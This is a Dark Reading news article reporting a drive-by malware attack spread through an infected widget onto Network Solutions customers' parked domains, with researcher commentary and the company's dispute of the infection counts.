Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.


05:32 PM
Connect Directly

Mass Drive-By Attack Used Web Widget

Attackers took a different spin on mass infection, and targeted hosting provider Network Solutions Inc.

A widespread Web attack discovered over the weekend that targeted Network Solutions Inc. customers' parked or "under construction" Web domains used a drive-by download attack more stubborn than the popular and more common mass SQL injection attacks.

The attack, which began with an infected widget on NSI's growsmartbusiness.com website for small businesses, led to a mass infection of NSI customers' reserved domains, according to researchers at Armorize who spotted the attack.

NSI has since cleaned up its growsmartbusiness.com site and alerted its domain customers to remove the compromised widget -- which offered tips for small businesses. Just how many NSI customers' domains remain infected is unclear: Researchers at Armorize, which first reported the attack over the weekend, say it infected at the least 500,000 domains, or possibly millions, according to a Yahoo search the researchers conducted.

Network Solutions, however, disputes those numbers. "We have removed the widget from those pages and continue to check and monitor to ensure security. The number of impacted pages that have reported publicly over the weekend are not accurate. We're still investigating the number of web pages affected," NSI posted on its website yesterday. "If you have downloaded the GrowSmartBusiness widget to your website, we recommend you delete that widget and scan your site for malware."

[UPDATE: NSI now says its preliminary analysis shows that less than 120,000 parked Web pages were hit. "No active Network Solutions customer websites were impacted. Additionally, there was also no compromise on our platform," NSI says in a new blog post.]

While the number of infected domains remains up for debate, the method used by the attackers to hit multiple domains was striking. Wayne Huang, co-founder and CTO at Armorize, says the attack method is a new breed of mass infection, or drive-by, attack. "I'm sure we're going to see more of it," he says.

But Neil Daswani, CTO and co-founder of Dasient, says he doesn't consider the attack waged on the NSI domains more sustainable or reliable. "It is very easy to mitigate and may not have as much of a significant impact -- it will only impact users that end up at a parked domain, usually by mistake or mistyping a legitimate domain name," says Daswani, whose firm recently conducted research on the use of widgets.

Dasient analyzed 5,000 websites and found that 75 percent of enterprises use third-party JavaScript widgets -- mostly travel, entertainment, and leisure websites running these apps, followed by publishing firms, high-tech companies, and financial institutions.

"Mass SQL injection against highly used and popular web applications could be more likely to help cybercriminals achieve a more significant malware distribution footprint," Daswani says.

Daswani also says widgets make an attractive attack target because one widget can be used by thousands of sites. "So even if widgets are not extremely vulnerable, an attacker that analyzes the cost/benefit trade-off may see that it is worthwhile to attack even a well-guarded widget because of the benefit they receive in terms of the number of sites they can turn into malware distribution vehicles," he says.

Meanwhile, Armorize's Huang maintains that what sets this attack apart from the more commonly used mass SQL injection is that it's not a one-time infection. "A mass SQL injection is a one-time thing," Huang says. "This one has multiple backdoors all over the system ... the attacker can remove it and you don't know where the backdoor is unless you do a full IR [incident response] process ... It's very hard to clean up your system."

And the attackers went after a domain hosting provider to reach more sites more quickly. "This is a new type of mass infection -- infecting hosting companies," he says. "We saw a lot of Web hosting instances at the beginning of this year. When you compromise a hosting company, you can insert malware into a lot of sites all at once."

Users get infected merely by visiting a site with the infected widget. So far the researchers have seen the attack exploiting vulnerabilities in Internet Explorer. "They visit a page and end up with malware. There's absolutely no click and no user awareness of anything. They visit the page, the [exploit] attacks a vulnerability inside the browser and takes control of the browser," he says.

Then the attacker writes malicious code to the disk and executes it, he says. The researchers found evidence of fully compromised websites by the attack with a Web "shell," basically a control panel the attackers install once they've fully compromised the site.

"This allows you to do anything you'd like to do, insert any content," he says.

Huang and his team also discovered a second piece of malware on NSI's page: a fake instant messaging window that mimics that of an actual Chinese IM service, targeting users with IP addresses in Taiwan and Hong Kong, although a handful or so of U.S. and Chinese visitors also were hit, he says.

The attackers behind the drive-by attack on NSI's domains appear to be out of Asia. The attack ultimately sends users to phishing sites, Huang says. Armorize actually first saw the attack in May, when researchers found it on the Boingboing.com parked domain. "We didn't realize then that the entire NSI parked domain was infected," Huang says.

Armorize's blog posts and demonstrations of the attacks are here.

Have a comment on this story? Please click "Discuss" below. If you'd like to contact Dark Reading's editors directly, send us a message.

Kelly Jackson Higgins is the Executive Editor of Dark Reading. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise ... View Full Bio

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
Mobile Banking Malware Up 50% in First Half of 2019
Kelly Sheridan, Staff Editor, Dark Reading,  1/17/2020
Exploits Released for As-Yet Unpatched Critical Citrix Flaw
Jai Vijayan, Contributing Writer,  1/13/2020
Microsoft to Officially End Support for Windows 7, Server 2008
Kelly Sheridan, Staff Editor, Dark Reading,  1/13/2020
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win a Starbucks Card! Click Here
Latest Comment: This comment is waiting for review by our moderators.
Current Issue
The Year in Security: 2019
This Tech Digest provides a wrap up and overview of the year's top cybersecurity news stories. It was a year of new twists on old threats, with fears of another WannaCry-type worm and of a possible botnet army of Wi-Fi routers. But 2019 also underscored the risk of firmware and trusted security tools harboring dangerous holes that cybercriminals and nation-state hackers could readily abuse. Read more.
Flash Poll
[Just Released] How Enterprises are Attacking the Cybersecurity Problem
[Just Released] How Enterprises are Attacking the Cybersecurity Problem
Organizations have invested in a sweeping array of security technologies to address challenges associated with the growing number of cybersecurity attacks. However, the complexity involved in managing these technologies is emerging as a major problem. Read this report to find out what your peers biggest security challenges are and the technologies they are using to address them.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2020-01-18
Westermo MRD-315 1.7.3 and 1.7.4 devices have an information disclosure vulnerability that allows an authenticated remote attacker to retrieve the source code of different functions of the web application via requests that lack certain mandatory parameters. This affects ifaces-diag.asp, system.asp, ...
PUBLISHED: 2020-01-18
A memory usage vulnerability exists in Trend Micro Password Manager 3.8 that could allow an attacker with access and permissions to the victim's memory processes to extract sensitive information.
PUBLISHED: 2020-01-18
A RootCA vulnerability found in Trend Micro Password Manager for Windows and macOS exists where the localhost.key of RootCA.crt might be improperly accessed by an unauthorized party and could be used to create malicious self-signed SSL certificates, allowing an attacker to misdirect a user to phishi...
PUBLISHED: 2020-01-18
An arbitrary code execution vulnerability exists in the Trend Micro Security 2019 (v15) consumer family of products which could allow an attacker to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start. An attacker must already have administr...
PUBLISHED: 2020-01-18
A Persistent Arbitrary Code Execution vulnerability exists in the Trend Micro Security 2020 (v160 and 2019 (v15) consumer familiy of products which could potentially allow an attacker the ability to create a malicious program to escalate privileges and attain persistence on a vulnerable system.